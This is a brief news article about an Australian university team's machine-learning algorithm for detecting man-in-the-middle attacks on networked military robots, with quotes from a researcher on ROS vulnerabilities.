New AI system can identify MITM attacks against robotic vehicles

Researchers at Charles Sturt University and the University of South Australia have created an algorithm to identify and stop man-in-the-middle (MitM) attacks on unmanned military robots.

MitM attacks are a kind of hack in which the data flow is intercepted to eavesdrop or introduce fake data into the stream between two parties, in this example, the robot and its authorized controllers.

These malicious attempts try to stop autonomous vehicles from operating, change the instructions that are sent, and sometimes even take over and give the robots harmful instructions.

Participating in the research, Professor Anthony Finn notes that “because the robot operating system (ROS) is so highly networked, it is extremely susceptible to data breaches and electronic hijacking.”

“The advent of Industry 4, marked by the evolution in robotics, automation, and the Internet of Things, has demanded that robots work collaboratively, where sensors, actuators, and controllers need to communicate and exchange information with one another via cloud services.”

“The downside of this is that it makes them highly vulnerable to cyberattacks.”

Using machine learning methods, the university researchers created an algorithm that can quickly identify these efforts and shut them down.

Share This Article